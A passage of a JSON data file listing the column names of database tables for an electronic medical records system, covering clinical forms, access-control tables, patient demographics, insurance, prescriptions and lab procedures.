"stomach_pains",
"peptic_ulcer_disease",
"gastritis",
"endoscopy",
"polyps",
"colonoscopy",
"colon_cancer",
"colon_cancer_surgery",
"ulcerative_colitis",
"crohns_disease",
"appendectomy",
"divirticulitis",
"divirticulitis_surgery",
"gall_stones",
"cholecystectomy",
"hepatitis",
"cirrhosis_of_the_liver",
"splenectomy",
"kidney_failure",
"kidney_stones",
"kidney_cancer",
"kidney_infections",
"bladder_infections",
"bladder_cancer",
"prostate_problems",
"prostate_cancer",
"kidney_transplant",
"sexually_transmitted_disease",
"burning_with_urination",
"discharge_from_urethra",
"rashes",
"infections",
"ulcerations",
"pemphigus",
"herpes",
"osetoarthritis",
"rheumotoid_arthritis",
"lupus",
"ankylosing_sondlilitis",
"swollen_joints",
"stiff_joints",
"broken_bones",
"neck_problems",
"back_problems",
"back_surgery",
"scoliosis",
"herniated_disc",
"shoulder_problems",
"elbow_problems",
"wrist_problems",
"hand_problems",
"hip_problems",
"knee_problems",
"ankle_problems",
"foot_problems",
"insulin_dependent_diabetes",
"noninsulin_dependent_diabetes",
"hypothyroidism",
"hyperthyroidism",
"cushing_syndrom",
"addison_syndrom",
"additional_notes"
],
"form_ros": [
"id",
"pid",
"activity",
"date",
"weight_change",
"weakness",
"fatigue",
"anorexia",
"fever",
"chills",
"night_sweats",
"insomnia",
"irritability",
"heat_or_cold",
"intolerance",
"change_in_vision",
"glaucoma_history",
"eye_pain",
"irritation",
"redness",
"excessive_tearing",
"double_vision",
"blind_spots",
"photophobia",
"hearing_loss",
"discharge",
"pain",
"vertigo",
"tinnitus",
"frequent_colds",
"sore_throat",
"sinus_problems",
"post_nasal_drip",
"nosebleed",
"snoring",
"apnea",
"breast_mass",
"breast_discharge",
"biopsy",
"abnormal_mammogram",
"cough",
"sputum",
"shortness_of_breath",
"wheezing",
"hemoptsyis",
"asthma",
"copd",
"chest_pain",
"palpitation",
"syncope",
"pnd",
"doe",
"orthopnea",
"peripheal",
"edema",
"legpain_cramping",
"history_murmur",
"arrythmia",
"heart_problem",
"dysphagia",
"heartburn",
"bloating",
"belching",
"flatulence",
"nausea",
"vomiting",
"hematemesis",
"gastro_pain",
"food_intolerance",
"hepatitis",
"jaundice",
"hematochezia",
"changed_bowel",
"diarrhea",
"constipation",
"polyuria",
"polydypsia",
"dysuria",
"hematuria",
"frequency",
"urgency",
"incontinence",
"renal_stones",
"utis",
"hesitancy",
"dribbling",
"stream",
"nocturia",
"erections",
"ejaculations",
"g",
"p",
"ap",
"lc",
"mearche",
"menopause",
"lmp",
"f_frequency",
"f_flow",
"f_symptoms",
"abnormal_hair_growth",
"f_hirsutism",
"joint_pain",
"swelling",
"m_redness",
"m_warm",
"m_stiffness",
"muscle",
"m_aches",
"fms",
"arthritis",
"loc",
"seizures",
"stroke",
"tia",
"n_numbness",
"n_weakness",
"paralysis",
"intellectual_decline",
"memory_problems",
"dementia",
"n_headache",
"s_cancer",
"psoriasis",
"s_acne",
"s_other",
"s_disease",
"p_diagnosis",
"p_medication",
"depression",
"anxiety",
"social_difficulties",
"thyroid_problems",
"diabetes",
"abnormal_blood",
"anemia",
"fh_blood_problems",
"bleeding_problems",
"allergies",
"frequent_illness",
"hiv",
"hai_status"
],
"form_soap": [
"id",
"date",
"pid",
"user",
"groupname",
"authorized",
"activity",
"subjective",
"objective",
"assessment",
"plan"
],
"form_taskman": [
"ID",
"REQ_DATE",
"FROM_ID",
"TO_ID",
"PATIENT_ID",
"DOC_TYPE",
"DOC_ID",
"ENC_ID",
"METHOD",
"COMPLETED",
"COMPLETED_DATE",
"COMMENT",
"USERFIELD_1"
],
"form_vitals": [
"id",
"uuid",
"date",
"pid",
"user",
"groupname",
"authorized",
"activity",
"bps",
"bpd",
"weight",
"height",
"temperature",
"temp_method",
"pulse",
"respiration",
"note",
"BMI",
"BMI_status",
"waist_circ",
"head_circ",
"oxygen_saturation",
"oxygen_flow_rate",
"external_id",
"ped_weight_height",
"ped_bmi",
"ped_head_circ",
"inhaled_oxygen_concentration",
"last_updated"
],
"form_vitals_calculation": [
"id",
"uuid",
"encounter",
"pid",
"date_start",
"date_end",
"created_at",
"updated_at",
"created_by",
"updated_by",
"calculation_id"
],
"form_vitals_calculation_components": [
"id",
"fvc_uuid",
"vitals_column",
"value",
"value_string",
"value_unit",
"component_order"
],
"form_vitals_calculation_form_vitals": [
"fvc_uuid",
"vitals_id"
],
"form_vital_details": [
"id",
"form_id",
"vitals_column",
"interpretation_list_id",
"interpretation_option_id",
"interpretation_codes",
"interpretation_title",
"reason_code",
"reason_description",
"reason_status"
],
"gacl_acl": [
"id",
"section_value",
"allow",
"enabled",
"return_value",
"note",
"updated_date"
],
"gacl_acl_sections": [
"id",
"value",
"order_value",
"name",
"hidden"
],
"gacl_acl_seq": [
"id"
],
"gacl_aco": [
"id",
"section_value",
"value",
"order_value",
"name",
"hidden"
],
"gacl_aco_map": [
"acl_id",
"section_value",
"value"
],
"gacl_aco_sections": [
"id",
"value",
"order_value",
"name",
"hidden"
],
"gacl_aco_sections_seq": [
"id"
],
"gacl_aco_seq": [
"id"
],
"gacl_aro": [
"id",
"section_value",
"value",
"order_value",
"name",
"hidden"
],
"gacl_aro_groups": [
"id",
"parent_id",
"lft",
"rgt",
"name",
"value"
],
"gacl_aro_groups_id_seq": [
"id"
],
"gacl_aro_groups_map": [
"acl_id",
"group_id"
],
"gacl_aro_map": [
"acl_id",
"section_value",
"value"
],
"gacl_aro_sections": [
"id",
"value",
"order_value",
"name",
"hidden"
],
"gacl_aro_sections_seq": [
"id"
],
"gacl_aro_seq": [
"id"
],
"gacl_axo": [
"id",
"section_value",
"value",
"order_value",
"name",
"hidden"
],
"gacl_axo_groups": [
"id",
"parent_id",
"lft",
"rgt",
"name",
"value"
],
"gacl_axo_groups_map": [
"acl_id",
"group_id"
],
"gacl_axo_map": [
"acl_id",
"section_value",
"value"
],
"gacl_axo_sections": [
"id",
"value",
"order_value",
"name",
"hidden"
],
"gacl_groups_aro_map": [
"group_id",
"aro_id"
],
"gacl_groups_axo_map": [
"group_id",
"axo_id"
],
"gacl_phpgacl": [
"name",
"value"
],
"globals": [
"gl_name",
"gl_index",
"gl_value"
],
"gprelations": [
"type1",
"id1",
"type2",
"id2"
],
"groups": [
"id",
"name",
"user"
],
"history_data": [
"id",
"uuid",
"coffee",
"tobacco",
"alcohol",
"sleep_patterns",
"exercise_patterns",
"seatbelt_use",
"counseling",
"hazardous_activities",
"recreational_drugs",
"last_breast_exam",
"last_mammogram",
"last_gynocological_exam",
"last_rectal_exam",
"last_prostate_exam",
"last_physical_exam",
"last_sigmoidoscopy_colonoscopy",
"last_ecg",
"last_cardiac_echo",
"last_retinal",
"last_fluvax",
"last_pneuvax",
"last_ldl",
"last_hemoglobin",
"last_psa",
"last_exam_results",
"history_mother",
"dc_mother",
"history_father",
"dc_father",
"history_siblings",
"dc_siblings",
"history_offspring",
"dc_offspring",
"history_spouse",
"dc_spouse",
"relatives_cancer",
"relatives_tuberculosis",
"relatives_diabetes",
"relatives_high_blood_pressure",
"relatives_heart_problems",
"relatives_stroke",
"relatives_epilepsy",
"relatives_mental_illness",
"relatives_suicide",
"cataract_surgery",
"tonsillectomy",
"cholecystestomy",
"heart_surgery",
"hysterectomy",
"hernia_repair",
"hip_replacement",
"knee_replacement",
"appendectomy",
"date",
"pid",
"name_1",
"value_1",
"name_2",
"value_2",
"additional_history",
"exams",
"usertext11",
"usertext12",
"usertext13",
"usertext14",
"usertext15",
"usertext16",
"usertext17",
"usertext18",
"usertext19",
"usertext20",
"usertext21",
"usertext22",
"usertext23",
"usertext24",
"usertext25",
"usertext26",
"usertext27",
"usertext28",
"usertext29",
"usertext30",
"userdate11",
"userdate12",
"userdate13",
"userdate14",
"userdate15",
"userarea11",
"userarea12",
"created_by"
],
"icd10_dx_order_code": [
"dx_id",
"dx_code",
"formatted_dx_code",
"valid_for_coding",
"short_desc",
"long_desc",
"active",
"revision"
],
"icd10_gem_dx_10_9": [
"map_id",
"dx_icd10_source",
"dx_icd9_target",
"flags",
"active",
"revision"
],
"icd10_gem_dx_9_10": [
"map_id",
"dx_icd9_source",
"dx_icd10_target",
"flags",
"active",
"revision"
],
"icd10_gem_pcs_10_9": [
"map_id",
"pcs_icd10_source",
"pcs_icd9_target",
"flags",
"active",
"revision"
],
"icd10_gem_pcs_9_10": [
"map_id",
"pcs_icd9_source",
"pcs_icd10_target",
"flags",
"active",
"revision"
],
"icd10_pcs_order_code": [
"pcs_id",
"pcs_code",
"valid_for_coding",
"short_desc",
"long_desc",
"active",
"revision"
],
"icd10_reimbr_dx_9_10": [
"map_id",
"code",
"code_cnt",
"ICD9_01",
"ICD9_02",
"ICD9_03",
"ICD9_04",
"ICD9_05",
"ICD9_06",
"active",
"revision"
],
"icd10_reimbr_pcs_9_10": [
"map_id",
"code",
"code_cnt",
"ICD9_01",
"ICD9_02",
"ICD9_03",
"ICD9_04",
"ICD9_05",
"ICD9_06",
"active",
"revision"
],
"icd9_dx_code": [
"dx_id",
"dx_code",
"formatted_dx_code",
"short_desc",
"long_desc",
"active",
"revision"
],
"icd9_dx_long_code": [
"dx_id",
"dx_code",
"long_desc",
"active",
"revision"
],
"icd9_sg_code": [
"sg_id",
"sg_code",
"formatted_sg_code",
"short_desc",
"long_desc",
"active",
"revision"
],
"icd9_sg_long_code": [
"sq_id",
"sg_code",
"long_desc",
"active",
"revision"
],
"immunizations": [
"id",
"uuid",
"patient_id",
"administered_date",
"immunization_id",
"cvx_code",
"manufacturer",
"lot_number",
"administered_by_id",
"administered_by",
"education_date",
"vis_date",
"note",
"create_date",
"update_date",
"created_by",
"updated_by",
"amount_administered",
"amount_administered_unit",
"expiration_date",
"route",
"administration_site",
"added_erroneously",
"external_id",
"completion_status",
"information_source",
"refusal_reason",
"ordering_provider",
"reason_code",
"reason_description",
"encounter_id"
],
"immunization_observation": [
"imo_id",
"imo_im_id",
"imo_pid",
"imo_criteria",
"imo_criteria_value",
"imo_user",
"imo_code",
"imo_codetext",
"imo_codetype",
"imo_vis_date_published",
"imo_vis_date_presented",
"imo_date_observation"
],
"insurance_companies": [
"id",
"uuid",
"name",
"attn",
"cms_id",
"ins_type_code",
"x12_receiver_id",
"x12_default_partner_id",
"alt_cms_id",
"inactive",
"eligibility_id",
"x12_default_eligibility_id",
"cqm_sop",
"date_created",
"last_updated"
],
"insurance_data": [
"id",
"uuid",
"type",
"provider",
"plan_name",
"policy_number",
"group_number",
"subscriber_lname",
"subscriber_mname",
"subscriber_fname",
"subscriber_relationship",
"subscriber_ss",
"subscriber_DOB",
"subscriber_street",
"subscriber_postal_code",
"subscriber_city",
"subscriber_state",
"subscriber_country",
"subscriber_phone",
"subscriber_employer",
"subscriber_employer_street",
"subscriber_employer_postal_code",
"subscriber_employer_state",
"subscriber_employer_country",
"subscriber_employer_city",
"copay",
"date",
"pid",
"subscriber_sex",
"accept_assignment",
"policy_type",
"subscriber_street_line_2",
"subscriber_employer_street_line_2",
"date_end"
],
"insurance_numbers": [
"id",
"provider_id",
"insurance_company_id",
"provider_number",
"rendering_provider_number",
"group_number",
"provider_number_type",
"rendering_provider_number_type"
],
"insurance_type_codes": [
"id",
"type",
"claim_type"
],
"ip_tracking": [
"id",
"ip_string",
"total_ip_login_fail_counter",
"ip_login_fail_counter",
"ip_last_login_fail",
"ip_auto_block_emailed",
"ip_force_block",
"ip_no_prevent_timing_attack"
],
"issue_encounter": [
"id",
"pid",
"list_id",
"encounter",
"resolved",
"uuid",
"created_by",
"updated_by",
"created_at",
"updated_at"
],
"issue_types": [
"active",
"category",
"type",
"plural",
"singular",
"abbreviation",
"style",
"force_show",
"ordering",
"aco_spec"
],
"jwt_grant_history": [
"id",
"jti",
"client_id",
"jti_exp",
"creation_date"
],
"keys": [
"id",
"name",
"value"
],
"lang_constants": [
"cons_id",
"constant_name"
],
"lang_custom": [
"lang_description",
"lang_code",
"constant_name",
"definition"
],
"lang_definitions": [
"def_id",
"cons_id",
"lang_id",
"definition"
],
"lang_languages": [
"lang_id",
"lang_code",
"lang_description",
"lang_is_rtl"
],
"layout_group_properties": [
"grp_form_id",
"grp_group_id",
"grp_title",
"grp_subtitle",
"grp_mapping",
"grp_seq",
"grp_activity",
"grp_repeats",
"grp_columns",
"grp_size",
"grp_issue_type",
"grp_aco_spec",
"grp_save_close",
"grp_init_open",
"grp_referrals",
"grp_unchecked",
"grp_services",
"grp_products",
"grp_diags",
"grp_last_update"
],
"layout_options": [
"form_id",
"field_id",
"group_id",
"title",
"seq",
"data_type",
"uor",
"fld_length",
"max_length",
"list_id",
"titlecols",
"datacols",
"default_value",
"edit_options",
"description",
"fld_rows",
"list_backup_id",
"source",
"conditions",
"validation",
"codes"
],
"lbf_data": [
"form_id",
"field_id",
"field_value"
],
"lbt_data": [
"form_id",
"field_id",
"field_value"
],
"lists": [
"id",
"uuid",
"date",
"type",
"subtype",
"title",
"udi",
"udi_data",
"begdate",
"enddate",
"returndate",
"occurrence",
"classification",
"referredby",
"extrainfo",
"diagnosis",
"activity",
"comments",
"pid",
"user",
"groupname",
"outcome",
"destination",
"reinjury_id",
"injury_part",
"injury_type",
"injury_grade",
"reaction",
"verification",
"external_allergyid",
"erx_source",
"erx_uploaded",
"modifydate",
"severity_al",
"external_id",
"list_option_id"
],
"lists_medication": [
"id",
"list_id",
"drug_dosage_instructions",
"usage_category",
"usage_category_title",
"request_intent",
"request_intent_title",
"medication_adherence_information_source",
"medication_adherence",
"medication_adherence_date_asserted",
"prescription_id",
"is_primary_record",
"reporting_source_record_id"
],
"lists_touch": [
"pid",
"type",
"date"
],
"list_options": [
"list_id",
"option_id",
"title",
"seq",
"is_default",
"option_value",
"mapping",
"notes",
"codes",
"toggle_setting_1",
"toggle_setting_2",
"activity",
"subtype",
"edit_options",
"timestamp",
"last_updated"
],
"log": [
"id",
"date",
"event",
"category",
"user",
"groupname",
"comments",
"user_notes",
"patient_id",
"success",
"checksum",
"crt_user",
"log_from",
"menu_item_id",
"ccda_doc_id"
],
"login_mfa_registrations": [
"user_id",
"name",
"last_challenge",
"method",
"var1",
"var2"
],
"log_comment_encrypt": [
"id",
"log_id",
"encrypt",
"checksum",
"checksum_api",
"version"
],
"medex_icons": [
"i_UID",
"msg_type",
"msg_status",
"i_description",
"i_html",
"i_blob"
],
"medex_outgoing": [
"msg_uid",
"msg_pid",
"msg_pc_eid",
"campaign_uid",
"msg_date",
"msg_type",
"msg_reply",
"msg_extra_text",
"medex_uid"
],
"medex_prefs": [
"MedEx_id",
"ME_username",
"ME_api_key",
"ME_facilities",
"ME_providers",
"ME_hipaa_default_override",
"PHONE_country_code",
"MSGS_default_yes",
"POSTCARDS_local",
"POSTCARDS_remote",
"LABELS_local",
"LABELS_choice",
"combine_time",
"postcard_top",
"status",
"MedEx_lastupdated"
],
"medex_recalls": [
"r_ID",
"r_PRACTID",
"r_pid",
"r_eventDate",
"r_facility",
"r_provider",
"r_reason",
"r_created"
],
"misc_address_book": [
"id",
"fname",
"mname",
"lname",
"street",
"city",
"state",
"zip",
"phone"
],
"modules": [
"mod_id",
"mod_name",
"mod_directory",
"mod_parent",
"mod_type",
"mod_active",
"mod_ui_name",
"mod_relative_link",
"mod_ui_order",
"mod_ui_active",
"mod_description",
"mod_nick_name",
"mod_enc_menu",
"permissions_item_table",
"directory",
"date",
"sql_run",
"type",
"sql_version",
"acl_version"
],
"modules_hooks_settings": [
"id",
"mod_id",
"enabled_hooks",
"attached_to"
],
"modules_settings": [
"mod_id",
"fld_type",
"obj_name",
"menu_name",
"path"
],
"module_acl_group_settings": [
"module_id",
"group_id",
"section_id",
"allowed"
],
"module_acl_sections": [
"section_id",
"section_name",
"parent_section",
"section_identifier",
"module_id"
],
"module_acl_user_settings": [
"module_id",
"user_id",
"section_id",
"allowed"
],
"module_configuration": [
"module_config_id",
"module_id",
"field_name",
"field_value",
"created_by",
"date_added",
"updated_by",
"date_modified",
"date_created"
],
"multiple_db": [
"id",
"namespace",
"username",
"password",
"dbname",
"host",
"port",
"date"
],
"notes": [
"id",
"foreign_id",
"note",
"owner",
"date",
"revision"
],
"notification_log": [
"iLogId",
"pid",
"pc_eid",
"sms_gateway_type",
"smsgateway_info",
"message",
"email_sender",
"email_subject",
"type",
"patient_info",
"pc_eventDate",
"pc_endDate",
"pc_startTime",
"pc_endTime",
"dSentDateTime"
],
"notification_settings": [
"SettingsId",
"Send_SMS_Before_Hours",
"Send_Email_Before_Hours",
"SMS_gateway_username",
"SMS_gateway_password",
"SMS_gateway_apikey",
"type"
],
"oauth_clients": [
"client_id",
"client_role",
"client_name",
"client_secret",
"registration_token",
"registration_uri_path",
"register_date",
"revoke_date",
"contacts",
"redirect_uri",
"grant_types",
"scope",
"user_id",
"site_id",
"is_confidential",
"logout_redirect_uris",
"jwks_uri",
"jwks",
"initiate_login_uri",
"endorsements",
"policy_uri",
"tos_uri",
"is_enabled",
"skip_ehr_launch_authorization_flow",
"dsi_type"
],
"oauth_trusted_user": [
"id",
"user_id",
"client_id",
"scope",
"persist_login",
"time",
"code",
"session_cache",
"grant_type"
],
"onetime_auth": [
"id",
"pid",
"create_user_id",
"context",
"access_count",
"remote_ip",
"onetime_pin",
"onetime_token",
"redirect_url",
"expires",
"date_created",
"last_accessed",
"scope",
"profile",
"onetime_actions"
],
"onotes": [
"id",
"date",
"body",
"user",
"groupname",
"activity"
],
"onsite_documents": [
"id",
"pid",
"facility",
"provider",
"encounter",
"create_date",
"doc_type",
"patient_signed_status",
"patient_signed_time",
"authorize_signed_time",
"accept_signed_status",
"authorizing_signator",
"review_date",
"denial_reason",
"authorized_signature",
"patient_signature",
"full_document",
"file_name",
"file_path",
"template_data"
],
"onsite_mail": [
"id",
"date",
"owner",
"user",
"groupname",
"activity",
"authorized",
"header",
"title",
"body",
"recipient_id",
"recipient_name",
"sender_id",
"sender_name",
"assigned_to",
"deleted",
"delete_date",
"mtype",
"message_status",
"mail_chain",
"reply_mail_chain",
"is_msg_encrypted"
],
"onsite_messages": [
"id",
"username",
"message",
"ip",
"date",
"sender_id",
"recip_id"
],
"onsite_online": [
"hash",
"ip",
"last_update",
"username",
"userid"
],
"onsite_portal_activity": [
"id",
"date",
"patient_id",
"activity",
"require_audit",
"pending_action",
"action_taken",
"status",
"narrative",
"table_action",
"table_args",
"action_user",
"action_taken_time",
"checksum"
],
"onsite_signatures": [
"id",
"status",
"type",
"created",
"lastmod",
"pid",
"encounter",
"user",
"activity",
"authorized",
"signator",
"sig_image",
"signature",
"sig_hash",
"ip"
],
"openemr_modules": [
"pn_id",
"pn_name",
"pn_type",
"pn_displayname",
"pn_description",
"pn_regid",
"pn_directory",
"pn_version",
"pn_admin_capable",
"pn_user_capable",
"pn_state"
],
"openemr_module_vars": [
"pn_id",
"pn_modname",
"pn_name",
"pn_value"
],
"openemr_postcalendar_categories": [
"pc_catid",
"pc_constant_id",
"pc_catname",
"pc_catcolor",
"pc_catdesc",
"pc_recurrtype",
"pc_enddate",
"pc_recurrspec",
"pc_recurrfreq",
"pc_duration",
"pc_end_date_flag",
"pc_end_date_type",
"pc_end_date_freq",
"pc_end_all_day",
"pc_dailylimit",
"pc_cattype",
"pc_active",
"pc_seq",
"aco_spec",
"pc_last_updated"
],
"openemr_postcalendar_events": [
"pc_eid",
"pc_catid",
"pc_multiple",
"pc_aid",
"pc_pid",
"pc_gid",
"pc_title",
"pc_time",
"pc_hometext",
"pc_comments",
"pc_counter",
"pc_topic",
"pc_informant",
"pc_eventDate",
"pc_endDate",
"pc_duration",
"pc_recurrtype",
"pc_recurrspec",
"pc_recurrfreq",
"pc_startTime",
"pc_endTime",
"pc_alldayevent",
"pc_location",
"pc_conttel",
"pc_contname",
"pc_contemail",
"pc_website",
"pc_fee",
"pc_eventstatus",
"pc_sharing",
"pc_language",
"pc_apptstatus",
"pc_prefcatid",
"pc_facility",
"pc_sendalertsms",
"pc_sendalertemail",
"pc_billing_location",
"pc_room",
"uuid"
],
"patient_access_onsite": [
"id",
"pid",
"portal_username",
"portal_pwd",
"portal_pwd_status",
"portal_login_username",
"portal_onetime",
"date_created"
],
"patient_birthday_alert": [
"pid",
"user_id",
"turned_off_on"
],
"patient_care_experience_preferences": [
"id",
"uuid",
"patient_id",
"observation_code",
"observation_code_text",
"value_type",
"value_code",
"value_code_system",
"value_display",
"value_text",
"value_boolean",
"effective_datetime",
"status",
"note"
],
"patient_data": [
"id",
"uuid",
"title",
"language",
"financial",
"fname",
"lname",
"mname",
"DOB",
"street",
"postal_code",
"city",
"state",
"country_code",
"drivers_license",
"ss",
"occupation",
"phone_home",
"phone_biz",
"phone_contact",
"phone_cell",
"pharmacy_id",
"status",
"contact_relationship",
"date",
"sex",
"referrer",
"referrerID",
"providerID",
"ref_providerID",
"email",
"email_direct",
"ethnoracial",
"race",
"ethnicity",
"religion",
"interpretter",
"migrantseasonal",
"family_size",
"monthly_income",
"billing_note",
"homeless",
"financial_review",
"pubpid",
"pid",
"genericname1",
"genericval1",
"genericname2",
"genericval2",
"hipaa_mail",
"hipaa_voice",
"hipaa_notice",
"hipaa_message",
"hipaa_allowsms",
"hipaa_allowemail",
"squad",
"fitness",
"referral_source",
"usertext1",
"usertext2",
"usertext3",
"usertext4",
"usertext5",
"usertext6",
"usertext7",
"usertext8",
"userlist1",
"userlist2",
"userlist3",
"userlist4",
"userlist5",
"userlist6",
"userlist7",
"pricelevel",
"regdate",
"contrastart",
"completed_ad",
"ad_reviewed",
"vfc",
"mothersname",
"guardiansname",
"allow_imm_reg_use",
"allow_imm_info_share",
"allow_health_info_ex",
"allow_patient_portal",
"deceased_date",
"deceased_reason",
"soap_import_status",
"cmsportal_login",
"care_team_provider",
"care_team_facility",
"care_team_status",
"county",
"industry",
"imm_reg_status",
"imm_reg_stat_effdate",
"publicity_code",
"publ_code_eff_date",
"protect_indicator",
"prot_indi_effdate",
"guardianrelationship",
"guardiansex",
"guardianaddress",
"guardiancity",
"guardianstate",
"guardianpostalcode",
"guardiancountry",
"guardianphone",
"guardianworkphone",
"guardianemail",
"sexual_orientation",
"gender_identity",
"birth_fname",
"birth_lname",
"birth_mname",
"dupscore",
"name_history",
"suffix",
"street_line_2",
"patient_groups",
"prevent_portal_apps",
"provider_since_date",
"created_by",
"updated_by",
"preferred_name",
"nationality_country",
"last_updated",
"tribal_affiliations",
"sex_identified",
"interpreter_needed",
"advance_directive_user_authenticator"
],
"patient_history": [
"id",
"uuid",
"date",
"care_team_provider",
"care_team_facility",
"pid",
"history_type_key",
"previous_name_prefix",
"previous_name_first",
"previous_name_middle",
"previous_name_last",
"previous_name_suffix",
"previous_name_enddate",
"created_by"
],
"patient_portal_menu": [
"patient_portal_menu_id",
"patient_portal_menu_group_id",
"menu_name",
"menu_order",
"menu_status"
],
"patient_reminders": [
"id",
"active",
"date_inactivated",
"reason_inactivated",
"due_status",
"pid",
"category",
"item",
"date_created",
"date_sent",
"voice_status",
"sms_status",
"email_status",
"mail_status"
],
"patient_settings": [
"setting_patient",
"setting_label",
"setting_value"
],
"patient_tracker": [
"id",
"date",
"apptdate",
"appttime",
"eid",
"pid",
"original_user",
"encounter",
"lastseq",
"random_drug_test",
"drug_screen_completed"
],
"patient_tracker_element": [
"pt_tracker_id",
"start_datetime",
"room",
"status",
"seq",
"user"
],
"patient_treatment_intervention_preferences": [
"id",
"uuid",
"patient_id",
"observation_code",
"observation_code_text",
"value_type",
"value_code",
"value_code_system",
"value_display",
"value_text",
"value_boolean",
"effective_datetime",
"status",
"note"
],
"payments": [
"id",
"pid",
"dtime",
"encounter",
"user",
"method",
"source",
"amount1",
"amount2",
"posted1",
"posted2"
],
"payment_gateway_details": [
"id",
"service_name",
"login_id",
"transaction_key",
"md5"
],
"payment_processing_audit": [
"uuid",
"service",
"pid",
"success",
"action_name",
"amount",
"ticket",
"transaction_id",
"audit_data",
"date",
"map_uuid",
"map_transaction_id",
"reverted",
"revert_action_name",
"revert_transaction_id",
"revert_audit_data",
"revert_date"
],
"person": [
"id",
"uuid",
"title",
"first_name",
"middle_name",
"last_name",
"preferred_name",
"gender",
"birth_date",
"death_date",
"marital_status",
"race",
"ethnicity",
"preferred_language",
"communication",
"ssn",
"active",
"inactive_reason",
"inactive_date",
"notes",
"created_date",
"created_by",
"updated_date",
"updated_by"
],
"person_patient_link": [
"id",
"person_id",
"patient_id",
"linked_date",
"linked_by",
"link_method",
"notes",
"active"
],
"pharmacies": [
"id",
"name",
"transmit_method",
"email",
"ncpdp",
"npi"
],
"phone_numbers": [
"id",
"country_code",
"area_code",
"prefix",
"number",
"type",
"foreign_id"
],
"pnotes": [
"id",
"date",
"body",
"pid",
"user",
"groupname",
"activity",
"authorized",
"title",
"assigned_to",
"deleted",
"message_status",
"portal_relation",
"is_msg_encrypted",
"update_by",
"update_date"
],
"preference_value_sets": [
"id",
"loinc_code",
"answer_code",
"answer_system",
"answer_display",
"answer_definition",
"sort_order",
"active"
],
"prescriptions": [
"id",
"uuid",
"patient_id",
"filled_by_id",
"pharmacy_id",
"date_added",
"date_modified",
"provider_id",
"encounter",
"start_date",
"drug",
"drug_id",
"rxnorm_drugcode",
"form",
"dosage",
"quantity",
"size",
"unit",
"route",
"interval",
"substitute",
"refills",
"per_refill",
"filled_date",
"medication",
"note",
"active",
"datetime",
"user",
"site",
"prescriptionguid",
"erx_source",
"erx_uploaded",
"drug_info_erx",
"external_id",
"end_date",
"indication",
"prn",
"ntx",
"rtx",
"txDate",
"usage_category",
"usage_category_title",
"request_intent",
"request_intent_title",
"drug_dosage_instructions",
"created_by",
"updated_by",
"diagnosis"
],
"prices": [
"pr_id",
"pr_selector",
"pr_level",
"pr_price"
],
"procedure_answers": [
"procedure_order_id",
"procedure_order_seq",
"question_code",
"answer_seq",
"answer",
"procedure_code"
],
"procedure_order": [
"procedure_order_id",
"uuid",
"provider_id",
"patient_id",
"encounter_id",
"date_collected",
"date_ordered",
"order_priority",
"order_status",
"patient_instructions",
"activity",
"control_id",
"lab_id",
"specimen_type",
"specimen_location",
"specimen_volume",
"date_transmitted",
"clinical_hx",
"external_id",
"history_order",
"order_diagnosis",
"billing_type",
"specimen_fasting",
"order_psc",
"order_abn",
"collector_id",
"account",
"account_facility",
"provider_number",
"procedure_order_type",
"scheduled_date",
"scheduled_start",
"scheduled_end",
"performer_type",
"order_intent",
"location_id"
],
"procedure_order_code": [
"procedure_order_id",
"procedure_order_seq",
"procedure_code",
"procedure_name",
"procedure_source",
"diagnoses",
"do_not_send",
"procedure_order_title",
"procedure_type",
"transport",
"date_end",
"reason_code",
"reason_description",
"reason_date_low",
"reason_date_high",
"reason_status"
],
"procedure_order_relationships": [
"id",
"procedure_order_id",
"resource_type",
"resource_uuid",
"relationship",
"created_at",
"created_by"
],
"procedure_providers": [
"ppid",
"uuid",
"name",
"npi",
"send_app_id",
"send_fac_id",
"recv_app_id",
"recv_fac_id",
"DorP",
"direction",
"protocol",
"remote_host",
"login",
"password",
"orders_path",
"results_path",
"notes",
"lab_director",
"active",
"type",
"date_created",
"last_updated"
],
"procedure_questions": [
"lab_id",
"procedure_code",
"question_code",
"seq",
"question_text",
"required",
"maxsize",
"fldtype",
"options",
"tips",
"activity"
],
"procedure_report": [
"procedure_report_id",
"uuid",
"procedure_order_id",
"procedure_order_seq",
"date_collected",
"date_collected_tz",
"date_report",
"date_report_tz",
"source",
"specimen_num",
"report_status",
"review_status",
"report_notes"
],
"procedure_result": [
"procedure_result_id",
"uuid",
"procedure_report_id",
"result_data_type",
"result_code",
"result_text",
"date",
"facility",
"units",
"result",
"range",
"abnormal",
"comments",
"document_id",
"result_status",
"date_end"
],
"procedure_specimen": [
"procedure_specimen_id",
"uuid",
"procedure_order_id",
"procedure_order_seq",
"specimen_identifier",
"accession_identifier",
"specimen_type_code",
"specimen_type",
"collection_method_code",
"collection_method",
"specimen_location_code",
"specimen_location",
"collected_date",
"collection_date_low",
"collection_date_high",
"volume_value",
"volume_unit",
"condition_code",
"specimen_condition",
"comments",
"created_at",
"updated_at",
"created_by",
"updated_by",
"deleted"
],
"procedure_type": [
"procedure_type_id",
"parent",
"name",
"lab_id",
"procedure_code",
"procedure_type",
"body_site",
"specimen",
"route_admin",
"laterality",
"description",
"standard_code",
"related_code",
"units",
"range",
"seq",
"activity",
"notes",
"transport",
"procedure_type_name"
],
"product_registration": [
"id",
"email",
"opt_out",
"auth_by_id",
"telemetry_disabled",
"last_ask_date",
"last_ask_version",
"options"
],
"product_warehouse": [
"pw_drug_id",
"pw_warehouse",
"pw_min_level",
"pw_max_level"
],
"pro_assessments": [
"id",
"form_oid",
"form_name",
"user_id",
"deadline",
"patient_id",
"assessment_oid",
"status",
"score",
"error",
"created_at",
"updated_at"
],
"questionnaire_repository": [
"id",
"uuid",
"questionnaire_id",
"provider",
"version",
"created_date",
"modified_date",
"name",
"type",
"profile",
"active",
"status",
"source_url",
"code",
"code_display",
"questionnaire",
"lform",
"category"
],
"questionnaire_response": [
"id",
"uuid",
"response_id",
"questionnaire_foreign_id",
"questionnaire_id",
"questionnaire_name",
"patient_id",
"encounter",
"audit_user_id",
"creator_user_id",
"create_time",
"last_updated",
"version",
"status",
"questionnaire",
"questionnaire_response",
"form_response",
"form_score",
"tscore",
"error"
],
"recent_patients": [
"user_id",
"patients"
],
"registry": [
"name",
"state",
"directory",
"id",
"sql_run",
"unpackaged",
"date",
"priority",
"category",
"nickname",
"patient_encounter",
"therapy_group_encounter",
"aco_spec",
"form_foreign_id"
],
"report_itemized": [
"report_id",
"itemized_test_id",
"numerator_label",
"pass",
"pid",
"rule_id",
"item_details"
],
"report_results": [
"report_id",
"field_id",
"field_value"
],
"rule_action": [
"id",
"group_id",
"category",
"item"
],
"rule_action_item": [
